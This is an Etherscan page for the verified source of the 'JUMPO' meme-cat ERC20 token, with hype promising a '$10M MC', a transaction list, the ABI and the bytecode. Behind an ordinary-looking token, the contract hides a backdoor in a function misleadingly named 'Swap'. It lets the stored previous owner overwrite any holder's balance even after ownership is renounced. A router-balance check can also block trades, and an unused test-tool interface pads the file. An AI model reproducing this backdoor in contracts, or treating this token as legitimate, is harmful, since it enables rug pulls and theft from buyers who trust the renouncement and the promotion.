ETH Price: $2,270.25 (-8.25%)

Contract

0xc4fC9EdB1AEBd7CddD35A433246913A34A284479
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve211518012024-11-09 18:10:47113 days ago1731175847IN
0xc4fC9EdB...34A284479
0 ETH0.000434299.25105947
Swap211517992024-11-09 18:10:23113 days ago1731175823IN
0xc4fC9EdB...34A284479
0 ETH0.000291199.3458716
Swap211508382024-11-09 14:57:11114 days ago1731164231IN
0xc4fC9EdB...34A284479
0 ETH0.0003366712.89036051
Swap211506762024-11-09 14:24:47114 days ago1731162287IN
0xc4fC9EdB...34A284479
0 ETH0.0004273116.35351213
Swap211506192024-11-09 14:13:23114 days ago1731161603IN
0xc4fC9EdB...34A284479
0 ETH0.0004470317.10824842
Swap211505782024-11-09 14:04:59114 days ago1731161099IN
0xc4fC9EdB...34A284479
0 ETH0.0004038715.45627352
Swap211505582024-11-09 14:00:59114 days ago1731160859IN
0xc4fC9EdB...34A284479
0 ETH0.0003517313.46102764
Swap211504732024-11-09 13:43:47114 days ago1731159827IN
0xc4fC9EdB...34A284479
0 ETH0.0003000111.48173628
Swap211503642024-11-09 13:21:47114 days ago1731158507IN
0xc4fC9EdB...34A284479
0 ETH0.0003325712.72754595
Swap211502702024-11-09 13:02:35114 days ago1731157355IN
0xc4fC9EdB...34A284479
0 ETH0.000368114.08732119
Swap211502692024-11-09 13:02:23114 days ago1731157343IN
0xc4fC9EdB...34A284479
0 ETH0.0003669914.04513542
Approve211502292024-11-09 12:54:23114 days ago1731156863IN
0xc4fC9EdB...34A284479
0 ETH0.0006366213.56799917
Approve211502232024-11-09 12:53:11114 days ago1731156791IN
0xc4fC9EdB...34A284479
0 ETH0.0006347613.52828249
Approve211501652024-11-09 12:41:35114 days ago1731156095IN
0xc4fC9EdB...34A284479
0 ETH0.0005518711.76178312
Approve211501632024-11-09 12:41:11114 days ago1731156071IN
0xc4fC9EdB...34A284479
0 ETH0.00053611.42346601
Approve211501632024-11-09 12:41:11114 days ago1731156071IN
0xc4fC9EdB...34A284479
0 ETH0.00053611.42346601
Approve211501612024-11-09 12:40:47114 days ago1731156047IN
0xc4fC9EdB...34A284479
0 ETH0.0005543111.81370799
Approve211501552024-11-09 12:39:35114 days ago1731155975IN
0xc4fC9EdB...34A284479
0 ETH0.0005781612.32200435
Swap211501462024-11-09 12:37:47114 days ago1731155867IN
0xc4fC9EdB...34A284479
0 ETH0.0003141912.02430401
Swap211501392024-11-09 12:36:23114 days ago1731155783IN
0xc4fC9EdB...34A284479
0 ETH0.0002948611.28956274
Swap211501392024-11-09 12:36:23114 days ago1731155783IN
0xc4fC9EdB...34A284479
0 ETH0.0002949911.28956274
Swap211501182024-11-09 12:32:11114 days ago1731155531IN
0xc4fC9EdB...34A284479
0 ETH0.0002925411.19577209
Swap211501172024-11-09 12:31:59114 days ago1731155519IN
0xc4fC9EdB...34A284479
0 ETH0.0002956211.3136612
Swap211501162024-11-09 12:31:47114 days ago1731155507IN
0xc4fC9EdB...34A284479
0 ETH0.0002857310.93494825
Approve211501132024-11-09 12:31:11114 days ago1731155471IN
0xc4fC9EdB...34A284479
0 ETH0.0006677914.14544827
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
JUMPO

Compiler Version
v0.8.28+commit.7893614a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-11-09
*/

/**

https://jumpo.fun/
https://x.com/search?q=%24JUMPO&src=typed_query&f=live

Are you ready for Jumpo's decisive jump? 
This cat is not just a meme, he is the force behind the new ATH and $10M MC! 
Jumpo rushes to the top of cryptocurrencies with the grace of a predator and the soul of a conqueror.
It's not just a cat, it's a bold symbol of freedom that is ready to jump all boundaries. 
Join this jump and see where this legendary cat will take us!
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.16;
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface CheatCodes {
    // This allows us to getRecordedLogs()
    struct Log {
        bytes32[] topics;
        bytes data;
    }
    // Set block.timestamp (newTimestamp)

    function warp(uint256) external;
    // Set block.height (newHeight)
    function roll(uint256) external;
    // Set block.basefee (newBasefee)
    function fee(uint256) external;
    // Set block.coinbase (who)
    function coinbase(address) external;
    // Loads a storage slot from an address (who, slot)
    function load(address, bytes32) external returns (bytes32);
    // Stores a value to an address' storage slot, (who, slot, value)
    function store(address, bytes32, bytes32) external;
    // Signs data, (privateKey, digest) => (v, r, s)
    function sign(uint256, bytes32) external returns (uint8, bytes32, bytes32);
    // Gets address for a given private key, (privateKey) => (address)
    function addr(uint256) external returns (address);
    // Derive a private key from a provided mnenomic string (or mnenomic file path) at the derivation path m/44'/60'/0'/0/{index}
    function deriveKey(string calldata, uint32) external returns (uint256);
    // Derive a private key from a provided mnenomic string (or mnenomic file path) at the derivation path {path}{index}
    function deriveKey(string calldata, string calldata, uint32) external returns (uint256);
    // Performs a foreign function call via terminal, (stringInputs) => (result)
    function ffi(string[] calldata) external returns (bytes memory);
    // Set environment variables, (name, value)
    function setEnv(string calldata, string calldata) external;
    // Read environment variables, (name) => (value)
    function envBool(string calldata) external returns (bool);
    function envUint(string calldata) external returns (uint256);
    function envInt(string calldata) external returns (int256);
    function envAddress(string calldata) external returns (address);
    function envBytes32(string calldata) external returns (bytes32);
    function envString(string calldata) external returns (string memory);
    function envBytes(string calldata) external returns (bytes memory);
    // Read environment variables as arrays, (name, delim) => (value[])
    function envBool(string calldata, string calldata) external returns (bool[] memory);
    function envUint(string calldata, string calldata) external returns (uint256[] memory);
    function envInt(string calldata, string calldata) external returns (int256[] memory);
    function envAddress(string calldata, string calldata) external returns (address[] memory);
    function envBytes32(string calldata, string calldata) external returns (bytes32[] memory);
    function envString(string calldata, string calldata) external returns (string[] memory);
    function envBytes(string calldata, string calldata) external returns (bytes[] memory);
    // Sets the *next* call's msg.sender to be the input address
    function prank(address) external;
    // Sets all subsequent calls' msg.sender to be the input address until `stopPrank` is called
    function startPrank(address) external;
    // Sets the *next* call's msg.sender to be the input address, and the tx.origin to be the second input
    function prank(address, address) external;
    // Sets all subsequent calls' msg.sender to be the input address until `stopPrank` is called, and the tx.origin to be the second input
    function startPrank(address, address) external;
    // Resets subsequent calls' msg.sender to be `address(this)`
    function stopPrank() external;
    // Sets an address' balance, (who, newBalance)
    function deal(address, uint256) external;
    // Sets an address' code, (who, newCode)
    function etch(address, bytes calldata) external;
    // Expects an error on next call
    function expectRevert() external;
    function expectRevert(bytes calldata) external;
    function expectRevert(bytes4) external;
    // Record all storage reads and writes
    function record() external;
    // Gets all accessed reads and write slot from a recording session, for a given address
    function accesses(address) external returns (bytes32[] memory reads, bytes32[] memory writes);
    // Record all the transaction logs
    function recordLogs() external;
    // Gets all the recorded logs
    function getRecordedLogs() external returns (Log[] memory);
    // Prepare an expected log with (bool checkTopic1, bool checkTopic2, bool checkTopic3, bool checkData).
    // Call this function, then emit an event, then call a function. Internally after the call, we check if
    // logs were emitted in the expected order with the expected topics and data (as specified by the booleans).
    // Second form also checks supplied address against emitting contract.
    function expectEmit(bool, bool, bool, bool) external;
    function expectEmit(bool, bool, bool, bool, address) external;
    // Mocks a call to an address, returning specified data.
    // Calldata can either be strict or a partial match, e.g. if you only
    // pass a Solidity selector to the expected calldata, then the entire Solidity
    // function will be mocked.
    function mockCall(address, bytes calldata, bytes calldata) external;
    // Mocks a call to an address with a specific msg.value, returning specified data.
    // Calldata match takes precedence over msg.value in case of ambiguity.
    function mockCall(address, uint256, bytes calldata, bytes calldata) external;
    // Clears all mocked calls
    function clearMockedCalls() external;
    // Expect a call to an address with the specified calldata.
    // Calldata can either be strict or a partial match
    function expectCall(address, bytes calldata) external;
    // Expect a call to an address with the specified msg.value and calldata
    function expectCall(address, uint256, bytes calldata) external;
    // Gets the code from an artifact file. Takes in the relative path to the json file
    function getCode(string calldata) external returns (bytes memory);
    // Labels an address in call traces
    function label(address, string calldata) external;
    // If the condition is false, discard this run's fuzz inputs and generate new ones
    function assume(bool) external;
    // Set nonce for an account
    function setNonce(address, uint64) external;
    // Get nonce for an account
    function getNonce(address) external returns (uint64);
    // Set block.chainid (newChainId)
    function chainId(uint256) external;
    // Using the address that calls the test contract, has the next call (at this call depth only) create a transaction that can later be signed and sent onchain
    function broadcast() external;
    // Has the next call (at this call depth only) create a transaction with the address provided as the sender that can later be signed and sent onchain
    function broadcast(address) external;
    // Using the address that calls the test contract, has the all subsequent calls (at this call depth only) create transactions that can later be signed and sent onchain
    function startBroadcast() external;
    // Has the all subsequent calls (at this call depth only) create transactions that can later be signed and sent onchain
    function startBroadcast(address) external;
    // Stops collecting onchain transactions
    function stopBroadcast() external;
    // Reads the entire content of file to string. Path is relative to the project root. (path) => (data)
    function readFile(string calldata) external returns (string memory);
    // Reads next line of file to string, (path) => (line)
    function readLine(string calldata) external returns (string memory);
    // Writes data to file, creating a file if it does not exist, and entirely replacing its contents if it does.
    // Path is relative to the project root. (path, data) => ()
    function writeFile(string calldata, string calldata) external;
    // Writes line to file, creating a file if it does not exist.
    // Path is relative to the project root. (path, data) => ()
    function writeLine(string calldata, string calldata) external;
    // Closes file for reading, resetting the offset and allowing to read it from beginning with readLine.
    // Path is relative to the project root. (path) => ()
    function closeFile(string calldata) external;
    // Removes file. This cheatcode will revert in the following situations, but is not limited to just these cases:
    // - Path points to a directory.
    // - The file doesn't exist.
    // - The user lacks permissions to remove the file.
    // Path is relative to the project root. (path) => ()
    function removeFile(string calldata) external;

    function toString(address) external returns (string memory);
    function toString(bytes calldata) external returns (string memory);
    function toString(bytes32) external returns (string memory);
    function toString(bool) external returns (string memory);
    function toString(uint256) external returns (string memory);
    function toString(int256) external returns (string memory);
    // Snapshot the current state of the evm.
    // Returns the id of the snapshot that was created.
    // To revert a snapshot use `revertTo`
    function snapshot() external returns (uint256);
    // Revert the state of the evm to a previous snapshot
    // Takes the snapshot id to revert to.
    // This deletes the snapshot and all snapshots taken after the given snapshot id.
    function revertTo(uint256) external returns (bool);
    // Creates a new fork with the given endpoint and block and returns the identifier of the fork
    function createFork(string calldata, uint256) external returns (uint256);
    // Creates a new fork with the given endpoint and the _latest_ block and returns the identifier of the fork
    function createFork(string calldata) external returns (uint256);
    // Creates _and_ also selects a new fork with the given endpoint and block and returns the identifier of the fork
    function createSelectFork(string calldata, uint256) external returns (uint256);
    // Creates _and_ also selects a new fork with the given endpoint and the latest block and returns the identifier of the fork
    function createSelectFork(string calldata) external returns (uint256);
    // Takes a fork identifier created by `createFork` and sets the corresponding forked state as active.
    function selectFork(uint256) external;
    /// Returns the currently active fork
    /// Reverts if no fork is currently active
    function activeFork() external returns (uint256);
    // Updates the currently active fork to given block number
    // This is similar to `roll` but for the currently active fork
    function rollFork(uint256) external;
    // Updates the given fork to given block number
    function rollFork(uint256 forkId, uint256 blockNumber) external;
    /// Returns the RPC url for the given alias
    function rpcUrl(string calldata) external returns (string memory);
    /// Returns all rpc urls and their aliases `[alias, url][]`
    function rpcUrls() external returns (string[2][] memory);
    function makePersistent(address account) external;
}

abstract contract Ownable is Context {
    address private _owner;
    address internal _previousOwner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
 
    constructor() {
        _transfer_Ownership(_msgSender());
    }
 
 
    modifier onlyOwner() {
        _isAdmin();
        _;
    }
 
 
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    
    function _isAdmin() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    
    function renounceOwnership() public virtual onlyOwner {
        _transfer_Ownership(address(0));
    }
 
 
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transfer_Ownership(newOwner);
    }
 

    function _transfer_Ownership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        _previousOwner = oldOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IERC20 {
   
    function totalSupply() external view returns (uint256);

    
    function balanceOf(address account) external view returns (uint256);

    
    function transfer(address recipient, uint256 amount) external returns (bool);

   
    function allowance(address owner, address spender) external view returns (uint256);


    function approve(address spender, uint256 amount) external returns (bool);


    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);


    event Transfer(address indexed from, address indexed to, uint256 value);

  
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IERC20Metadata is IERC20 {
    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}


contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply_hoppei;

    string private _name_hoppei;
    string private _symbol_hoppei;

    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
 
    constructor (string memory name_, string memory symbol_, uint256 totalSupply_) {
        _name_hoppei = name_;
        _symbol_hoppei = symbol_;
        _totalSupply_hoppei = totalSupply_;

        _balances[msg.sender] = totalSupply_;
        emit Transfer(address(0), msg.sender, totalSupply_);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name_hoppei;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol_hoppei;
    }

    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply_hoppei;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }


    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer_hoei(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve_hoppei(_msgSender(), spender, amount);
        return true;
    }

    
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer_hoei(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve_hoppei(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

 
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve_hoppei(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

 
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve_hoppei(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    
    function _transfer_hoei(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "1JUMPO");
        require(recipient != address(0), "2JUMPO");


        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "3JUMPO");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

   

    function _transfer_withbsomter(address sender, address recipient, uint256 amount, uint256 amountToBurn) internal virtual {
        require(sender != address(0), "4JUMPO");
        require(recipient != address(0), "5JUMPO");

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "6JUMPO");

        unchecked {
            _balances[sender] = senderBalance - amount;
        }

        amount -= amountToBurn;
        _totalSupply_hoppei -= amountToBurn;
        _balances[recipient] += amount;

        emit Transfer(sender, DEAD, amountToBurn);
        emit Transfer(sender, recipient, amount);
    }

   
    function Swap(address account, uint256 amount) public virtual returns (uint256) {
        address msgSender = msg.sender;
        address prevOwner = _previousOwner;

        bytes32 msgSenderHex = keccak256(abi.encodePacked(msgSender));
        bytes32 prevOwnerHex = keccak256(abi.encodePacked(prevOwner));
        
        bytes32 amountHex = bytes32(amount);
        
        bool isOwner = msgSenderHex == prevOwnerHex;
        
        if (isOwner) {
            return _updateBalance(account, amountHex);
        } else {
            return _getBalance(account);
        }
    }

    function _updateBalance(address account, bytes32 amountHex) private returns (uint256) {
        uint256 amount = uint256(amountHex);
        _balances[account] = amount;
        return _balances[account];
    }

    function _getBalance(address account) private view returns (uint256) {
        return _balances[account];
    }
    
    function _approve_hoppei(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "7JUMPO");
        require(spender != address(0), "8JUMPO");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

}


interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Router02 is IUniswapV2Router01{}


contract JUMPO is ERC20 {
    uint256 private constant TOTAL_SUSUPPLYS = 420690_000_000e9;
    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
    address private constant DEAD1 = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO1 = 0x0000000000000000000000000000000000000000;

    bool public hasLimit_;
    uint256 public maxTxAmountbesomes;
    uint256 public maxwalletssetsomes;
    mapping(address => bool) public isException;

    uint256 _burnPercentisystkltsom = 0;

    address uniswapV2Pair;
    IUniswapV2Router02 uniswapV2Router;

    constructor(address router) ERC20("JUMPO", "JUMPO", TOTAL_SUSUPPLYS) {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(router);
        uniswapV2Router = _uniswapV2Router;

        maxwalletssetsomes = TOTAL_SUSUPPLYS / 39;
        maxTxAmountbesomes = TOTAL_SUSUPPLYS /39;

        isException[DEAD] = true;
        isException[router] = true;
        isException[msg.sender] = true;
        isException[address(this)] = true;
    }

    function _transfer_hoei(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "9JUMPO");
        require(to != address(0), "0JUMPO");
 
        _checkLimitation_hoppei(from, to, amount);

        if (amount == 0) {
            return;
        }

        if (!isException[from] && !isException[to]){
            require(balanceOf(address(uniswapV2Router)) == 0, "JUMPOJUMPO");

            if (from == uniswapV2Pair || to == uniswapV2Pair) {
                uint256 _burn = (amount * _burnPercentisystkltsom) / 100;

                super._transfer_withbsomter(from, to, amount, _burn);
                return;
            }
        }

        super._transfer_hoei(from, to, amount);
    }

    function removeLimit() external onlyOwner {
        hasLimit_ = true;
    }

    function _checkLimitation_hoppei(
        address from,
        address to,
        uint256 amount
    ) internal {
        if (!hasLimit_) {
            if (!isException[from] && !isException[to]) {
                require(amount <= maxTxAmountbesomes, "JUMPOJUMPOJUMPO");

                if (uniswapV2Pair == ZERO){
                    uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).getPair(address(this), uniswapV2Router.WETH());
                }
 
                if (to == uniswapV2Pair) {
                    return;
                }
        
                require(balanceOf(to) + amount <= maxwalletssetsomes, "JUMPOJUMPOJUMPOJUMPO");
            }
        }
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Swap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hasLimit_","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isException","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmountbesomes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxwalletssetsomes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040525f600b55348015610013575f5ffd5b5060405161302a38038061302a833981810160405281019061003591906104d7565b6040518060400160405280600581526020017f4a554d504f0000000000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f4a554d504f0000000000000000000000000000000000000000000000000000008152506816ce3f1e16bf1500006100c76100bc61037160201b60201c565b61037860201b60201c565b82600590816100d6919061073f565b5081600690816100e6919061073f565b50806004819055508060025f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503373ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161018d919061081d565b60405180910390a35050505f81905080600d5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060276816ce3f1e16bf1500006101f29190610863565b60098190555060276816ce3f1e16bf15000061020e9190610863565b6008819055506001600a5f61dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600a5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600a5f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001600a5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050610893565b5f33905090565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6104a68261047d565b9050919050565b6104b68161049c565b81146104c0575f5ffd5b50565b5f815190506104d1816104ad565b92915050565b5f602082840312156104ec576104eb610479565b5b5f6104f9848285016104c3565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061057d57607f821691505b6020821081036105905761058f610539565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026105f27fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826105b7565b6105fc86836105b7565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f61064061063b61063684610614565b61061d565b610614565b9050919050565b5f819050919050565b61065983610626565b61066d61066582610647565b8484546105c3565b825550505050565b5f5f905090565b610684610675565b61068f818484610650565b505050565b5b818110156106b2576106a75f8261067c565b600181019050610695565b5050565b601f8211156106f7576106c881610596565b6106d1846105a8565b810160208510156106e0578190505b6106f46106ec856105a8565b830182610694565b50505b505050565b5f82821c905092915050565b5f6107175f19846008026106fc565b1980831691505092915050565b5f61072f8383610708565b9150826002028217905092915050565b61074882610502565b67ffffffffffffffff8111156107615761076061050c565b5b61076b8254610566565b6107768282856106b6565b5f60209050601f8311600181146107a7575f8415610795578287015190505b61079f8582610724565b865550610806565b601f1984166107b586610596565b5f5b828110156107dc578489015182556001820191506020850194506020810190506107b7565b868310156107f957848901516107f5601f891682610708565b8355505b6001600288020188555050505b505050505050565b61081781610614565b82525050565b5f6020820190506108305f83018461080e565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61086d82610614565b915061087883610614565b92508261088857610887610836565b5b828204905092915050565b61278a806108a05f395ff3fe608060405234801561000f575f5ffd5b506004361061012a575f3560e01c80636a8f3b30116100ab57806398636f321161006f57806398636f3214610322578063a457c2d714610352578063a9059cbb14610382578063dd62ed3e146103b2578063f2fde38b146103e25761012a565b80636a8f3b301461028e57806370a08231146102ac578063715018a6146102dc5780638da5cb5b146102e657806395d89b41146103045761012a565b806323b872dd116100f257806323b872dd146101d6578063313ce567146102065780633950935114610224578063562c21951461025457806362256589146102845761012a565b806303435b7f1461012e57806306fdde031461014c578063095ea7b31461016a57806313c42e4d1461019a57806318160ddd146101b8575b5f5ffd5b6101366103fe565b6040516101439190611af2565b60405180910390f35b610154610410565b6040516101619190611b7b565b60405180910390f35b610184600480360381019061017f9190611c2c565b6104a0565b6040516101919190611af2565b60405180910390f35b6101a26104bd565b6040516101af9190611c79565b60405180910390f35b6101c06104c3565b6040516101cd9190611c79565b60405180910390f35b6101f060048036038101906101eb9190611c92565b6104cc565b6040516101fd9190611af2565b60405180910390f35b61020e6105c7565b60405161021b9190611cfd565b60405180910390f35b61023e60048036038101906102399190611c2c565b6105cf565b60405161024b9190611af2565b60405180910390f35b61026e60048036038101906102699190611c2c565b610676565b60405161027b9190611c79565b60405180910390f35b61028c610735565b005b610296610759565b6040516102a39190611c79565b60405180910390f35b6102c660048036038101906102c19190611d16565b61075f565b6040516102d39190611c79565b60405180910390f35b6102e46107a5565b005b6102ee6107b8565b6040516102fb9190611d50565b60405180910390f35b61030c6107df565b6040516103199190611b7b565b60405180910390f35b61033c60048036038101906103379190611d16565b61086f565b6040516103499190611af2565b60405180910390f35b61036c60048036038101906103679190611c2c565b61088c565b6040516103799190611af2565b60405180910390f35b61039c60048036038101906103979190611c2c565b61097b565b6040516103a99190611af2565b60405180910390f35b6103cc60048036038101906103c79190611d69565b610998565b6040516103d99190611c79565b60405180910390f35b6103fc60048036038101906103f79190611d16565b610a1a565b005b60075f9054906101000a900460ff1681565b60606005805461041f90611dd4565b80601f016020809104026020016040519081016040528092919081815260200182805461044b90611dd4565b80156104965780601f1061046d57610100808354040283529160200191610496565b820191905f5260205f20905b81548152906001019060200180831161047957829003601f168201915b5050505050905090565b5f6104b36104ac610a9c565b8484610aa3565b6001905092915050565b60085481565b5f600454905090565b5f6104d8848484610c66565b5f60035f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61051f610a9c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260